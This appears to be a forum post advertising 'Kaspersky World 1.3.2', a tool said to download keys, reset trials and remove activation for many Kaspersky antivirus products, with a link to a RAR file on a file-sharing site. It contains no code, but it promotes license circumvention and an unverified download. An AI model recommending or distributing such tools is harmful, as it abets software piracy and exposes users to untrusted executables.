    Kaspersky World is a special software on it to deal with Activation Problemsrelated to your Kaspersky Antivirus. By using Kaspersky World you can load forKaspersky Keys, Trial Reset and many more of their role. This software is compatible enough for almost Kasperskysproduct. Therefore, immediate downloadKaspersky World 1.3.2 for your Kaspersky.

    Features :

    • Download keys for Kaspersky Lab products
    • Activate Your Kaspersky using. Key-file
    • Extract original key
    • Manage Kaspersky's registry data
    • Remove Kaspersky's activation
    • Remove trial-notifications

    Used For :

    • Kaspersky Antivirus 2009
    • Kaspersky Antivirus 2010
    • Kaspersky Antivirus 2011
    • Kaspersky Antivirus 2012
    • Kaspersky Antivirus 6
    • Kaspersky Antivirus 7
    • Kaspersky Endpoint Security
    • Kaspersky Internet Security 2009
    • Kaspersky Internet Security 2010
    • Kaspersky Internet Security 2011
    • Kaspersky Internet Security 2012
    • Kaspersky Internet Security 6
    • Kaspersky Internet Security 7
    • Kaspersky Pure
    • Kaspersky Small Office Security.

    Screenshots :


    [​IMG]

    Requirement :

    • Windows 2000/ ME XP/ Vista/ 7/ Server 2003/ 2008 (32 and 64 bit)
    • Internet Connection
    ​Kaspersky_World_1.3.2.96.rar - 4shared.com - online file sharing and storage - download
     
Loading...